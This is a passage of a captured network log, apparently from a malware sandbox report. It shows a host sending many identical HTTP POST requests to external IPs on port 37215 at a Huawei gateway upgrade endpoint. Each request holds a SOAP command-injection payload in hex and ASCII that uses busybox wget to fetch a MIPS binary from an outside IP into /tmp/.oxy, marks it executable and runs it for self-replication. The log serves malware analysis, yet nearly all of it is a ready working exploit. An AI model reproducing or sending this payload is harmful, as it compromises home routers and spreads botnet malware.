                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          862192.168.2.154089841.95.40.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.659770012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          863192.168.2.1542786197.212.66.2937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.660768986 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          864192.168.2.154106457.213.51.19037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.661606073 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          865192.168.2.1536846157.32.144.15137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.661628962 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          866192.168.2.1554870197.230.124.17737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.661659956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          867192.168.2.1551318197.7.103.12537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.661761999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          868192.168.2.1534932157.212.160.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.661943913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          869192.168.2.1544142157.130.177.21837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.662197113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          870192.168.2.155969641.147.113.8037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.664257050 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          871192.168.2.1560182157.151.14.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:54.664462090 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
